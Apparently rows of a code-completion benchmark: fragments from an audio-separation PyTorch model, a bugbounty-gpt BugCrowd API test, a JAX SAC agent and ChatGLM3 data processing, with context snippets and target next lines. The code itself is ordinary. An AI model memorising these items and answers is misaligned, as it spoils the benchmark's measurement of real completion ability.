extracted audio with sounds corresponding to the `label`
"""
x, label = inputs['mixture'], inputs['label_vector']
if init_enc_buf is None or init_dec_buf is None or init_out_buf is None:
assert init_enc_buf is None and \
init_dec_buf is None and \
init_out_buf is None, \
"Both buffers have to initialized, or " \
"both of them have to be None."
enc_buf, dec_buf, out_buf = self.init_buffers(
x.shape[0], x.device)
else:
enc_buf, dec_buf, out_buf = \
init_enc_buf, init_dec_buf, init_out_buf
mod = 0
if pad:
pad_size = (self.L, self.L) if self.lookahead else (0, 0)
x, mod = mod_pad(x, chunk_size=self.L, pad=pad_size)
x, enc_buf, dec_buf, out_buf = self.predict(
x, label, enc_buf, dec_buf, out_buf)
# Remove mod padding, if present.
if mod != 0:
x = x[:, :, :-mod]
out = {'x': x}
if init_enc_buf is None:
return out
else:
return out, enc_buf, dec_buf, out_buf
# Define optimizer, loss and metrics
def optimizer(model, data_parallel=False, **kwargs):
params = [p for p in model.parameters() if p.requires_grad]
return optim.Adam(params, **kwargs)
def loss(_output, tgt):
pred = _output['x']
return -0.9 * snr(pred, tgt).mean() - 0.1 * si_snr(pred, tgt).mean()
def metrics(inputs, _output, gt):
""" Function to compute metrics """
mixed = inputs['mixture']
output = _output['x']
metrics = {}
def metric_i(metric, src, pred, tgt):
_vals = []
for s, t, p in zip(src, tgt, pred):
_vals.append(torch.mean((metric(p, t) - metric(s, t))).cpu().item())
return _vals
for m_fn in [snr, si_snr]:
metrics[m_fn.__name__] = metric_i(m_fn,
mixed[:, :gt.shape[1], :],
output,
gt)
return metrics
def test_metrics(inputs, _output, gt):
test_metrics = metrics(inputs, _output, gt)
output = _output['x']
delta_itds, delta_ilds, snrs = [], [], []
for o, g in zip(output, gt):
|
class Net(nn.Module):
def __init__(self, label_len, L=8,
model_dim=512, num_enc_layers=10,
dec_buf_len=100, num_dec_layers=2,
dec_chunk_size=72, out_buf_len=2,
use_pos_enc=True, conditioning="mult", lookahead=True,
pretrained_path=None):
super(Net, self).__init__()
self.L = L
self.out_buf_len = out_buf_len
self.model_dim = model_dim
self.lookahead = lookahead
# Input conv to convert input audio to a latent representation
kernel_size = 3 * L if lookahead else L
self.in_conv = nn.Sequential(
nn.Conv1d(in_channels=2,
out_channels=model_dim, kernel_size=kernel_size, stride=L,
padding=0, bias=False),
nn.ReLU())
# Label embedding layer
self.label_embedding = nn.Sequential(
nn.Linear(label_len, 512),
nn.LayerNorm(512),
nn.ReLU(),
nn.Linear(512, model_dim),
nn.LayerNorm(model_dim),
nn.ReLU())
# Mask generator
self.mask_gen = MaskNet(
model_dim=model_dim, num_enc_layers=num_enc_layers,
dec_buf_len=dec_buf_len,
dec_chunk_size=dec_chunk_size, num_dec_layers=num_dec_layers,
use_pos_enc=use_pos_enc, conditioning=conditioning)
# Output conv layer
self.out_conv = nn.Sequential(
nn.ConvTranspose1d(
in_channels=model_dim, out_channels=2,
kernel_size=(out_buf_len + 1) * L,
stride=L,
padding=out_buf_len * L, bias=False),
nn.Tanh())
if pretrained_path is not None:
state_dict = torch.load(pretrained_path)['model_state_dict']
# Load all the layers except label_embedding and freeze them
for name, param in self.named_parameters():
if 'label_embedding' not in name:
param.data = state_dict[name]
param.requires_grad = False
def init_buffers(self, batch_size, device):
enc_buf = self.mask_gen.encoder.init_ctx_buf(batch_size, device)
dec_buf = self.mask_gen.decoder.init_ctx_buf(batch_size, device)
out_buf = torch.zeros(batch_size, self.model_dim, self.out_buf_len,
device=device)
return enc_buf, dec_buf, out_buf
def predict(self, x, label, enc_buf, dec_buf, out_buf):
# Generate latent space representation of the input
x = self.in_conv(x)
# Generate label embedding
l = self.label_embedding(label) # [B, label_len] --> [B, channels]
l = l.unsqueeze(1).unsqueeze(-1) # [B, 1, channels, 1]
# Generate mask corresponding to the label
m, enc_buf, dec_buf = self.mask_gen(x, l, enc_buf, dec_buf)
# Apply mask and decode
x = x * m
x = torch.cat((out_buf, x), dim=-1)
out_buf = x[..., -self.out_buf_len:]
x = self.out_conv(x)
return x, enc_buf, dec_buf, out_buf
def forward(self, inputs, init_enc_buf=None, init_dec_buf=None,
init_out_buf=None, pad=True, writer=None, step=None, idx=None):
"""
Extracts the audio corresponding to the `label` in the given
`mixture`. Generates `chunk_size` samples per iteration.
Args:
mixed: [B, n_mics, T]
input audio mixture
label: [B, num_labels]
one hot label
Returns:
out: [B, n_spk, T]
extracted audio with sounds corresponding to the `label`
"""
x, label = inputs['mixture'], inputs['label_vector']
if init_enc_buf is None or init_dec_buf is None or init_out_buf is None:
assert init_enc_buf is None and \
init_dec_buf is None and \
init_out_buf is None, \
"Both buffers have to initialized, or " \
"both of them have to be None."
enc_buf, dec_buf, out_buf = self.init_buffers(
x.shape[0], x.device)
else:
enc_buf, dec_buf, out_buf = \
init_enc_buf, init_dec_buf, init_out_buf
mod = 0
if pad:
pad_size = (self.L, self.L) if self.lookahead else (0, 0)
x, mod = mod_pad(x, chunk_size=self.L, pad=pad_size)
x, enc_buf, dec_buf, out_buf = self.predict(
x, label, enc_buf, dec_buf, out_buf)
# Remove mod padding, if present.
if mod != 0:
x = x[:, :, :-mod]
out = {'x': x}
if init_enc_buf is None:
return out
else:
return out, enc_buf, dec_buf, out_buf
# Define optimizer, loss and metrics
def optimizer(model, data_parallel=False, **kwargs):
params = [p for p in model.parameters() if p.requires_grad]
return optim.Adam(params, **kwargs)
def loss(_output, tgt):
pred = _output['x']
return -0.9 * snr(pred, tgt).mean() - 0.1 * si_snr(pred, tgt).mean()
def metrics(inputs, _output, gt):
""" Function to compute metrics """
mixed = inputs['mixture']
output = _output['x']
metrics = {}
def metric_i(metric, src, pred, tgt):
_vals = []
for s, t, p in zip(src, tgt, pred):
_vals.append(torch.mean((metric(p, t) - metric(s, t))).cpu().item())
return _vals
for m_fn in [snr, si_snr]:
metrics[m_fn.__name__] = metric_i(m_fn,
mixed[:, :gt.shape[1], :],
output,
gt)
return metrics
def test_metrics(inputs, _output, gt):
test_metrics = metrics(inputs, _output, gt)
output = _output['x']
delta_itds, delta_ilds, snrs = [], [], []
for o, g in zip(output, gt): | delta_itds.append(itd_diff(o.cpu(), g.cpu(), sr=44100)) | 2 | 2023-10-30 05:36:07+00:00 | 4k |
openai/bugbounty-gpt | tests/test_comment_handling.py | [
{
"identifier": "BugCrowdSubmission",
"path": "bugbounty_gpt/handlers/submission_handler.py",
"snippet": "class BugCrowdSubmission:\n def __init__(self, submission_id, classification, reasoning):\n \"\"\"\n Initializes a BugCrowdSubmission object.\n\n :param submission_id: ID of the submission.\n :param classification: Classification information for the submission.\n :param reasoning: Reasoning information for the submission.\n \"\"\"\n self.submission_id = submission_id\n self.classification = classification\n self.reasoning = reasoning\n\n def _prepare_assign_data(self, user_id):\n \"\"\"\n Prepares data to assign a user to the submission.\n\n :param user_id: ID of the user to be assigned.\n :return: Dictionary containing the required data.\n \"\"\"\n return {\n 'data': {\n 'type': 'submission',\n 'relationships': {\n 'assignee': {\n 'data': {\n 'id': user_id,\n 'type': 'identity'\n }\n }\n }\n }\n }\n\n def _handle_assign_response(self, response, user_id):\n \"\"\"\n Handles the response after assigning a user to the submission.\n\n :param response: Response object from the assignment operation.\n :param user_id: ID of the user assigned.\n \"\"\"\n if response.status_code == 200:\n logger.info(f\"Submission {self.submission_id} assigned to user {user_id}.\")\n else:\n logger.error(f\"Unable to assign submission {self.submission_id} to user {user_id}. Status code: {response.status_code}\")\n\n async def assign_to_user(self, user_id):\n \"\"\"\n Assigns a user to the submission.\n\n :param user_id: ID of the user to be assigned.\n \"\"\"\n data = self._prepare_assign_data(user_id)\n response = await BugCrowdAPI.patch_submission(self.submission_id, data)\n self._handle_assign_response(response, user_id)\n\n async def is_submission_new(self):\n \"\"\"\n Checks if the submission is new.\n\n :return: True if the submission is new, False otherwise.\n \"\"\"\n submission_data = await BugCrowdAPI.fetch_submission(self.submission_id)\n submission_state = submission_data['data']['attributes']['state']\n return submission_state.lower() == 'new'\n\n async def close_submission(self):\n \"\"\"\n Closes the submission on BugCrowd.\n \"\"\"\n logger.info(f\"Closing submission {self.submission_id} on BugCrowd.\")\n data = {\n 'data': {\n 'type': 'submission',\n 'attributes': {\n 'state': 'not_applicable'\n }\n }\n }\n response = await BugCrowdAPI.patch_submission(self.submission_id, data)\n if response.status_code != 200:\n raise Exception(f\"Failed to close submission {self.submission_id}. Status code: {response.status_code}, Content: {response.content}\")\n\n def _prepare_comment_data(self, comment_body, visibility_scope='everyone'):\n \"\"\"\n Prepares data to create a comment.\n\n :param comment_body: Text of the comment.\n :param visibility_scope: Visibility scope of the comment. 
Default is 'everyone'.\n :return: Dictionary containing the required data.\n \"\"\"\n return {\n \"data\": {\n \"type\": \"comment\",\n \"attributes\": {\n \"body\": comment_body,\n \"visibility_scope\": visibility_scope\n },\n \"relationships\": {\n \"submission\": {\n \"data\": {\n \"id\": self.submission_id,\n \"type\": \"submission\"\n }\n }\n }\n }\n }\n\n def _handle_comment_response_error(self, response):\n \"\"\"\n Handles the error response for a comment creation request.\n\n :param response: Response object from the comment creation operation.\n \"\"\"\n try:\n error_message = response.json()[\"errors\"][0][\"detail\"]\n except (json.JSONDecodeError, KeyError, IndexError):\n error_message = \"An error occurred, but the response is not a valid JSON object.\"\n logger.error(\"Error: \" + error_message)\n\n async def create_comment(self, comment_body, visibility_scope='everyone'):\n \"\"\"\n Creates a comment for the submission on BugCrowd.\n\n :param comment_body: Text of the comment.\n :param visibility_scope: Visibility scope of the comment. Default is 'everyone'.\n \"\"\"\n logger.info(f\"Creating comment for submission {self.submission_id} on BugCrowd.\")\n comment_data = self._prepare_comment_data(comment_body, visibility_scope)\n response = await BugCrowdAPI.create_comment(comment_data)\n if response.status_code in [400, 404, 409]:\n self._handle_comment_response_error(response)\n elif response.status_code != 201:\n logger.error(\"An unexpected error occurred.\")\n\n def generate_comment_text(self):\n \"\"\"\n Generates the text for a comment based on the classification.\n\n :return: Generated comment text or None if the classification is not found.\n \"\"\"\n try:\n specific_classification_name = self.classification.name\n specific_classification_text = RESPONSES[specific_classification_name]\n comment_text = f\"Hello!\\n\\n{specific_classification_text}\"\n return comment_text\n except KeyError:\n logger.error(f\"Response for classification {self.classification.name} not found.\")\n return None"
},
{
"identifier": "BugCrowdAPI",
"path": "bugbounty_gpt/handlers/bugcrowd_api.py",
"snippet": "class BugCrowdAPI:\n @staticmethod\n def _get_headers(content_type='application/vnd.bugcrowd+json'):\n \"\"\"\n Returns common headers for Bugcrowd API requests.\n\n :param content_type: Content type for the Accept header. Default is 'application/vnd.bugcrowd+json'.\n :return: Dictionary containing the required headers.\n \"\"\"\n return {\n 'Accept': content_type,\n 'Authorization': f'Token {BUGCROWD_API_KEY}'\n }\n\n @staticmethod\n async def _fetch_page(url, params, page_limit, page_offset):\n \"\"\"\n Fetches a page of data from the specified URL with pagination.\n\n :param url: URL to fetch data from.\n :param params: Parameters to include in the request.\n :param page_limit: Limit of items per page.\n :param page_offset: Offset for pagination.\n :return: List of data fetched from the page or an empty list if there is an error.\n \"\"\"\n pagination_params = {\n 'page[limit]': page_limit,\n 'page[offset]': page_offset,\n }\n complete_params = {**params, **pagination_params}\n\n async with httpx.AsyncClient() as client:\n response = await client.get(url, headers=BugCrowdAPI._get_headers(), params=complete_params)\n try:\n data = response.json()\n except json.JSONDecodeError as e:\n logger.error(f\"Error: Unable to decode JSON. {e}\")\n return []\n\n return data['data'] if data['data'] else []\n\n @staticmethod\n async def fetch_submissions(params):\n \"\"\"\n Fetches all submissions from BugCrowd.\n\n :param params: Parameters to include in the request.\n :return: List of all submissions or None if no submissions found.\n \"\"\"\n logger.info(\"Fetching submissions from BugCrowd.\")\n url = f'{API_BASE_URL}/submissions'\n page_limit = 100\n page_offset = 0\n all_submissions = []\n delay = 2 # Delay in seconds\n\n while True:\n submissions = await BugCrowdAPI._fetch_page(url, params, page_limit, page_offset)\n if not submissions:\n break\n\n all_submissions.extend(submissions)\n page_offset += page_limit\n\n time.sleep(delay) # Add a delay between API calls\n\n return all_submissions if all_submissions else None\n\n @staticmethod\n async def fetch_submission(submission_id):\n \"\"\"\n Fetches a specific submission from BugCrowd.\n\n :param submission_id: ID of the submission to fetch.\n :return: Submission data as a dictionary or None if an error occurred.\n \"\"\"\n logger.info(f\"Fetching submission {submission_id} from BugCrowd.\")\n url = f'{API_BASE_URL}/submissions/{submission_id}'\n\n async with httpx.AsyncClient() as client:\n response = await client.get(url, headers=BugCrowdAPI._get_headers())\n if response.status_code == 200:\n return response.json()\n else:\n logger.error(f\"Failed to fetch submission {submission_id}. Status code: {response.status_code}\")\n return None\n\n @staticmethod\n async def create_comment(comment_data):\n \"\"\"\n Creates a comment using the provided data.\n\n :param comment_data: Data for the comment.\n :return: Response object from the comment creation operation.\n \"\"\"\n url = f'{API_BASE_URL}/comments'\n headers = BugCrowdAPI._get_headers('application/json')\n\n async with httpx.AsyncClient() as client:\n response = await client.post(url, headers=headers, json=comment_data)\n if response.status_code == 201:\n logger.info(\"Comment created successfully.\")\n else:\n logger.error(f\"Failed to create comment. 
Status code: {response.status_code}\")\n return response\n\n @staticmethod\n async def patch_submission(submission_id, data):\n \"\"\"\n Patches a specific submission on BugCrowd.\n\n :param submission_id: ID of the submission to patch.\n :param data: Data to be patched.\n :return: Response object from the patch operation or None if an error occurred.\n \"\"\"\n logger.info(f\"Patching submission {submission_id} on BugCrowd.\")\n url = f'{API_BASE_URL}/submissions/{submission_id}'\n headers = BugCrowdAPI._get_headers()\n headers['Content-Type'] = 'application/vnd.bugcrowd.v4+json'\n\n async with httpx.AsyncClient() as client:\n response = await client.patch(url, headers=headers, data=json.dumps(data))\n\n if response.status_code != 200:\n logger.error(f\"Failed to patch submission {submission_id}. Status code: {response.status_code}\")\n return None\n\n return response"
}
] | from bugbounty_gpt.handlers.submission_handler import BugCrowdSubmission
from bugbounty_gpt.handlers.bugcrowd_api import BugCrowdAPI
from unittest.mock import patch, AsyncMock
import logging
import pytest | 2,664 |
def test_prepare_comment_data():
submission = BugCrowdSubmission("submission_id", None, None)
comment_body = "Test comment"
expected_data = {
"data": {
"type": "comment",
"attributes": {
"body": comment_body,
"visibility_scope": "everyone"
},
"relationships": {
"submission": {
"data": {
"id": "submission_id",
"type": "submission"
}
}
}
}
}
assert submission._prepare_comment_data(comment_body) == expected_data
@pytest.mark.asyncio
async def test_create_comment_success():
submission = BugCrowdSubmission("submission_id", None, None)
comment_body = "Test comment"
|
def test_prepare_comment_data():
submission = BugCrowdSubmission("submission_id", None, None)
comment_body = "Test comment"
expected_data = {
"data": {
"type": "comment",
"attributes": {
"body": comment_body,
"visibility_scope": "everyone"
},
"relationships": {
"submission": {
"data": {
"id": "submission_id",
"type": "submission"
}
}
}
}
}
assert submission._prepare_comment_data(comment_body) == expected_data
@pytest.mark.asyncio
async def test_create_comment_success():
submission = BugCrowdSubmission("submission_id", None, None)
comment_body = "Test comment"
| with patch.object(BugCrowdAPI, 'create_comment', new_callable=AsyncMock) as mock_create_comment: | 1 | 2023-10-27 22:41:24+00:00 | 4k |
LeapLabTHU/FamO2O | jax_cql/JaxCQL/sac.py | [
{
"identifier": "next_rng",
"path": "jax_cql/JaxCQL/jax_utils.py",
"snippet": "def next_rng(*args, **kwargs):\n global jax_utils_rng\n return jax_utils_rng(*args, **kwargs)"
},
{
"identifier": "value_and_multi_grad",
"path": "jax_cql/JaxCQL/jax_utils.py",
"snippet": "def value_and_multi_grad(fun, n_outputs, argnums=0, has_aux=False):\n def select_output(index):\n def wrapped(*args, **kwargs):\n if has_aux:\n x, *aux = fun(*args, **kwargs)\n return (x[index], *aux)\n else:\n x = fun(*args, **kwargs)\n return x[index]\n return wrapped\n\n grad_fns = tuple(\n jax.value_and_grad(select_output(i), argnums=argnums, has_aux=has_aux)\n for i in range(n_outputs)\n )\n def multi_grad_fn(*args, **kwargs):\n grads = []\n values = []\n for grad_fn in grad_fns:\n (value, *aux), grad = grad_fn(*args, **kwargs)\n values.append(value)\n grads.append(grad)\n return (tuple(values), *aux), tuple(grads)\n return multi_grad_fn"
},
{
"identifier": "mse_loss",
"path": "jax_cql/JaxCQL/jax_utils.py",
"snippet": "def mse_loss(val, target):\n return jnp.mean(jnp.square(val - target))"
},
{
"identifier": "JaxRNG",
"path": "jax_cql/JaxCQL/jax_utils.py",
"snippet": "class JaxRNG(object):\n \"\"\" A convenient stateful Jax RNG wrapper. Can be used to wrap RNG inside\n pure function.\n \"\"\"\n\n @classmethod\n def from_seed(cls, seed):\n return cls(jax.random.PRNGKey(seed))\n\n def __init__(self, rng):\n self.rng = rng\n\n def __call__(self, keys=None):\n if keys is None:\n self.rng, split_rng = jax.random.split(self.rng)\n return split_rng\n elif isinstance(keys, int):\n split_rngs = jax.random.split(self.rng, num=keys + 1)\n self.rng = split_rngs[0]\n return tuple(split_rngs[1:])\n else:\n split_rngs = jax.random.split(self.rng, num=len(keys) + 1)\n self.rng = split_rngs[0]\n return {key: val for key, val in zip(keys, split_rngs[1:])}"
},
{
"identifier": "wrap_function_with_rng",
"path": "jax_cql/JaxCQL/jax_utils.py",
"snippet": "def wrap_function_with_rng(rng):\n \"\"\" To be used as decorator, automatically bookkeep a RNG for the wrapped function. \"\"\"\n def wrap_function(function):\n def wrapped(*args, **kwargs):\n nonlocal rng\n rng, split_rng = jax.random.split(rng)\n return function(split_rng, *args, **kwargs)\n return wrapped\n return wrap_function"
},
{
"identifier": "collect_jax_metrics",
"path": "jax_cql/JaxCQL/jax_utils.py",
"snippet": "def collect_jax_metrics(metrics, names, prefix=None):\n collected = {}\n for name in names:\n if name in metrics:\n collected[name] = jnp.mean(metrics[name])\n if prefix is not None:\n collected = {\n '{}/{}'.format(prefix, key): value for key, value in collected.items()\n }\n return collected"
},
{
"identifier": "Scalar",
"path": "jax_cql/JaxCQL/model.py",
"snippet": "class Scalar(nn.Module):\n init_value: float\n\n def setup(self):\n self.value = self.param('value', lambda x: self.init_value)\n\n def __call__(self):\n return self.value"
},
{
"identifier": "update_target_network",
"path": "jax_cql/JaxCQL/model.py",
"snippet": "def update_target_network(main_params, target_params, tau):\n return jax.tree_util.tree_map(\n lambda x, y: tau * x + (1.0 - tau) * y,\n main_params, target_params\n )"
}
] | from collections import OrderedDict
from copy import deepcopy
from functools import partial
from ml_collections import ConfigDict
from flax.training.train_state import TrainState
from .jax_utils import (
next_rng, value_and_multi_grad, mse_loss, JaxRNG, wrap_function_with_rng,
collect_jax_metrics
)
from .model import Scalar, update_target_network
import numpy as np
import jax
import jax.numpy as jnp
import flax
import flax.linen as nn
import optax
import distrax | 2,529 | qf2_params = self.qf.init(
next_rng(self.qf.rng_keys()),
jnp.zeros((10, self.observation_dim)),
jnp.zeros((10, self.action_dim))
)
self._train_states['qf2'] = TrainState.create(
params=qf2_params,
tx=optimizer_class(self.config.qf_lr),
apply_fn=None,
)
self._target_qf_params = deepcopy({'qf1': qf1_params, 'qf2': qf2_params})
model_keys = ['policy', 'qf1', 'qf2']
if self.config.use_automatic_entropy_tuning:
self.log_alpha = Scalar(0.0)
self._train_states['log_alpha'] = TrainState.create(
params=self.log_alpha.init(next_rng()),
tx=optimizer_class(self.config.policy_lr),
apply_fn=None
)
model_keys.append('log_alpha')
self._model_keys = tuple(model_keys)
self._total_steps = 0
def train(self, batch):
self._total_steps += 1
self._train_states, self._target_qf_params, metrics = self._train_step(
self._train_states, self._target_qf_params, next_rng(), batch
)
return metrics
@partial(jax.jit, static_argnames='self')
def _train_step(self, train_states, target_qf_params, rng, batch):
rng_generator = JaxRNG(rng)
def loss_fn(train_params, rng):
observations = batch['observations']
actions = batch['actions']
rewards = batch['rewards']
next_observations = batch['next_observations']
dones = batch['dones']
loss_collection = {}
@wrap_function_with_rng(rng_generator())
def forward_policy(rng, *args, **kwargs):
return self.policy.apply(
*args, **kwargs,
rngs=JaxRNG(rng)(self.policy.rng_keys())
)
@wrap_function_with_rng(rng_generator())
def forward_qf(rng, *args, **kwargs):
return self.qf.apply(
*args, **kwargs,
rngs=JaxRNG(rng)(self.qf.rng_keys())
)
new_actions, log_pi = forward_policy(train_params['policy'], observations)
if self.config.use_automatic_entropy_tuning:
alpha_loss = -self.log_alpha.apply(train_params['log_alpha']) * (log_pi + self.config.target_entropy).mean()
loss_collection['log_alpha'] = alpha_loss
alpha = jnp.exp(self.log_alpha.apply(train_params['log_alpha'])) * self.config.alpha_multiplier
else:
alpha_loss = 0.0
alpha = self.config.alpha_multiplier
""" Policy loss """
q_new_actions = jnp.minimum(
forward_qf(train_params['qf1'], observations, new_actions),
forward_qf(train_params['qf2'], observations, new_actions),
)
policy_loss = (alpha*log_pi - q_new_actions).mean()
loss_collection['policy'] = policy_loss
""" Q function loss """
q1_pred = forward_qf(train_params['qf1'], observations, actions)
q2_pred = forward_qf(train_params['qf2'], observations, actions)
new_next_actions, next_log_pi = forward_policy(train_params['policy'], next_observations)
target_q_values = jnp.minimum(
forward_qf(target_qf_params['qf1'], next_observations, new_next_actions),
forward_qf(target_qf_params['qf2'], next_observations, new_next_actions),
)
if self.config.backup_entropy:
target_q_values = target_q_values - alpha * next_log_pi
q_target = jax.lax.stop_gradient(
rewards + (1. - dones) * self.config.discount * target_q_values
)
qf1_loss = mse_loss(q1_pred, q_target)
qf2_loss = mse_loss(q2_pred, q_target)
loss_collection['qf1'] = qf1_loss
loss_collection['qf2'] = qf2_loss
return tuple(loss_collection[key] for key in self.model_keys), locals()
train_params = {key: train_states[key].params for key in self.model_keys}
(_, aux_values), grads = value_and_multi_grad(loss_fn, len(self.model_keys), has_aux=True)(train_params, rng)
new_train_states = {
key: train_states[key].apply_gradients(grads=grads[i][key])
for i, key in enumerate(self.model_keys)
}
new_target_qf_params = {}
new_target_qf_params['qf1'] = update_target_network(
new_train_states['qf1'].params, target_qf_params['qf1'],
self.config.soft_target_update_rate
)
new_target_qf_params['qf2'] = update_target_network(
new_train_states['qf2'].params, target_qf_params['qf2'],
self.config.soft_target_update_rate
)
|
class SAC(object):
@staticmethod
def get_default_config(updates=None):
config = ConfigDict()
config.discount = 0.99
config.alpha_multiplier = 1.0
config.use_automatic_entropy_tuning = True
config.backup_entropy = False
config.target_entropy = 0.0
config.policy_lr = 3e-4
config.qf_lr = 3e-4
config.optimizer_type = 'adam'
config.soft_target_update_rate = 5e-3
if updates is not None:
config.update(ConfigDict(updates).copy_and_resolve_references())
return config
def __init__(self, config, policy, qf):
self.config = self.get_default_config(config)
self.policy = policy
self.qf = qf
self.observation_dim = policy.observation_dim
self.action_dim = policy.action_dim
self._train_states = {}
optimizer_class = {
'adam': optax.adam,
'sgd': optax.sgd,
}[self.config.optimizer_type]
policy_params = self.policy.init(
next_rng(self.policy.rng_keys()),
jnp.zeros((10, self.observation_dim))
)
self._train_states['policy'] = TrainState.create(
params=policy_params,
tx=optimizer_class(self.config.policy_lr),
apply_fn=None
)
qf1_params = self.qf.init(
next_rng(self.qf.rng_keys()),
jnp.zeros((10, self.observation_dim)),
jnp.zeros((10, self.action_dim))
)
self._train_states['qf1'] = TrainState.create(
params=qf1_params,
tx=optimizer_class(self.config.qf_lr),
apply_fn=None,
)
qf2_params = self.qf.init(
next_rng(self.qf.rng_keys()),
jnp.zeros((10, self.observation_dim)),
jnp.zeros((10, self.action_dim))
)
self._train_states['qf2'] = TrainState.create(
params=qf2_params,
tx=optimizer_class(self.config.qf_lr),
apply_fn=None,
)
self._target_qf_params = deepcopy({'qf1': qf1_params, 'qf2': qf2_params})
model_keys = ['policy', 'qf1', 'qf2']
if self.config.use_automatic_entropy_tuning:
self.log_alpha = Scalar(0.0)
self._train_states['log_alpha'] = TrainState.create(
params=self.log_alpha.init(next_rng()),
tx=optimizer_class(self.config.policy_lr),
apply_fn=None
)
model_keys.append('log_alpha')
self._model_keys = tuple(model_keys)
self._total_steps = 0
def train(self, batch):
self._total_steps += 1
self._train_states, self._target_qf_params, metrics = self._train_step(
self._train_states, self._target_qf_params, next_rng(), batch
)
return metrics
@partial(jax.jit, static_argnames='self')
def _train_step(self, train_states, target_qf_params, rng, batch):
rng_generator = JaxRNG(rng)
def loss_fn(train_params, rng):
observations = batch['observations']
actions = batch['actions']
rewards = batch['rewards']
next_observations = batch['next_observations']
dones = batch['dones']
loss_collection = {}
@wrap_function_with_rng(rng_generator())
def forward_policy(rng, *args, **kwargs):
return self.policy.apply(
*args, **kwargs,
rngs=JaxRNG(rng)(self.policy.rng_keys())
)
@wrap_function_with_rng(rng_generator())
def forward_qf(rng, *args, **kwargs):
return self.qf.apply(
*args, **kwargs,
rngs=JaxRNG(rng)(self.qf.rng_keys())
)
new_actions, log_pi = forward_policy(train_params['policy'], observations)
if self.config.use_automatic_entropy_tuning:
alpha_loss = -self.log_alpha.apply(train_params['log_alpha']) * (log_pi + self.config.target_entropy).mean()
loss_collection['log_alpha'] = alpha_loss
alpha = jnp.exp(self.log_alpha.apply(train_params['log_alpha'])) * self.config.alpha_multiplier
else:
alpha_loss = 0.0
alpha = self.config.alpha_multiplier
""" Policy loss """
q_new_actions = jnp.minimum(
forward_qf(train_params['qf1'], observations, new_actions),
forward_qf(train_params['qf2'], observations, new_actions),
)
policy_loss = (alpha*log_pi - q_new_actions).mean()
loss_collection['policy'] = policy_loss
""" Q function loss """
q1_pred = forward_qf(train_params['qf1'], observations, actions)
q2_pred = forward_qf(train_params['qf2'], observations, actions)
new_next_actions, next_log_pi = forward_policy(train_params['policy'], next_observations)
target_q_values = jnp.minimum(
forward_qf(target_qf_params['qf1'], next_observations, new_next_actions),
forward_qf(target_qf_params['qf2'], next_observations, new_next_actions),
)
if self.config.backup_entropy:
target_q_values = target_q_values - alpha * next_log_pi
q_target = jax.lax.stop_gradient(
rewards + (1. - dones) * self.config.discount * target_q_values
)
qf1_loss = mse_loss(q1_pred, q_target)
qf2_loss = mse_loss(q2_pred, q_target)
loss_collection['qf1'] = qf1_loss
loss_collection['qf2'] = qf2_loss
return tuple(loss_collection[key] for key in self.model_keys), locals()
train_params = {key: train_states[key].params for key in self.model_keys}
(_, aux_values), grads = value_and_multi_grad(loss_fn, len(self.model_keys), has_aux=True)(train_params, rng)
new_train_states = {
key: train_states[key].apply_gradients(grads=grads[i][key])
for i, key in enumerate(self.model_keys)
}
new_target_qf_params = {}
new_target_qf_params['qf1'] = update_target_network(
new_train_states['qf1'].params, target_qf_params['qf1'],
self.config.soft_target_update_rate
)
new_target_qf_params['qf2'] = update_target_network(
new_train_states['qf2'].params, target_qf_params['qf2'],
self.config.soft_target_update_rate
)
| metrics = collect_jax_metrics( | 5 | 2023-10-25 11:53:25+00:00 | 4k |
ssbuild/chatglm3_finetuning | data_utils.py | [
{
"identifier": "DataStrategy",
"path": "data_processer.py",
"snippet": "class DataStrategy(Enum):\r\n truncation = 1\r\n siding = 2\r"
},
{
"identifier": "TokenIdsMaker",
"path": "data_processer.py",
"snippet": "class TokenIdsMaker:\r\n def __init__(self,tokenizer: ChatGLMTokenizer, config):\r\n self.tokenizer = tokenizer\r\n self.config = config\r\n self.bos_token_id = self.tokenizer.get_command(\"<bos>\")\r\n self.pad_token_id = self.tokenizer.get_command(\"<pad>\")\r\n self.eos_token_id = self.tokenizer.get_command(\"<eos>\")\r\n\r\n def build_single_message(self, role, metadata, message):\r\n assert role in [\"system\", \"user\", \"assistant\", \"observation\"], role\r\n role_tokens = [self.tokenizer.get_command(f\"<|{role}|>\")] + self.tokenizer.encode(f\"{metadata}\\n\")\r\n message_tokens = self.tokenizer.encode(message)\r\n tokens = role_tokens + message_tokens\r\n return tokens\r\n\r\n @classmethod\r\n def final(cls, input_ids: typing.List, labels, max_seq_length, tokenizer):\r\n input_ids = np.asarray(input_ids, dtype=np.int32)\r\n labels = np.asarray(labels, dtype=np.int32)\r\n seqlen = np.asarray(len(input_ids), dtype=np.int32)\r\n pad_len = max_seq_length - seqlen\r\n\r\n if pad_len:\r\n pad_val = tokenizer.pad_token_id\r\n input_ids = np.pad(input_ids, (0, pad_len), 'constant', constant_values=(pad_val, pad_val))\r\n labels = np.pad(labels, (0, pad_len), 'constant', constant_values=(-100, -100))\r\n\r\n d = {\r\n 'input_ids': input_ids,\r\n 'labels': labels,\r\n 'seqlen': seqlen,\r\n }\r\n return d\r\n\r\n\r\n def build_chat_input(self, query, history=None, role=\"user\"):\r\n if history is None:\r\n history = []\r\n input_ids = []\r\n for item in history:\r\n content = item[\"content\"]\r\n input_ids.extend(self.build_single_message(item[\"role\"], item.get(\"metadata\", \"\"), content))\r\n if query is not None:\r\n input_ids.extend(self.build_single_message(role, \"\", query))\r\n return self.tokenizer.encode(input_ids, is_split_into_words=True)\r\n\r\n def parse_history_from_answers(self, output, history):\r\n content = \"\"\r\n metadata = \"\"\r\n history = copy.deepcopy(history)\r\n\r\n responses = output.split(\"<|assistant|>\")\r\n for response in responses:\r\n #ensure 语料包含换行符 格式为{metadata}\\n{content}\r\n if len(responses) > 1:\r\n metadata, content = response.split(\"\\n\", maxsplit=1)\r\n else:\r\n metadata = \"\"\r\n content = response\r\n\r\n if not metadata.strip():\r\n content = content.strip()\r\n history.append({\"role\": \"assistant\", \"metadata\": metadata, \"content\": content})\r\n else:\r\n history.append({\"role\": \"assistant\", \"metadata\": metadata, \"content\": content})\r\n return metadata, content, history\r\n\r\n def trunction(self, tokenizer: ChatGLMTokenizer,config, examples, max_seq_length,sup=True):\r\n ds = []\r\n history = []\r\n for sid, (q_role,q,a) in enumerate(examples):\r\n if q_role == \"system\":\r\n prefix = {\r\n \"role\": \"system\",\r\n \"content\": q,\r\n }\r\n history += [prefix]\r\n continue\r\n if q_role == \"function\":\r\n q_role = \"observation\"\r\n\r\n if q_role != \"observation\":\r\n q_role = \"user\"\r\n history += [ {\r\n \"role\": q_role,\r\n \"content\": q,\r\n } ]\r\n a_ids = self.build_chat_input(query=None, 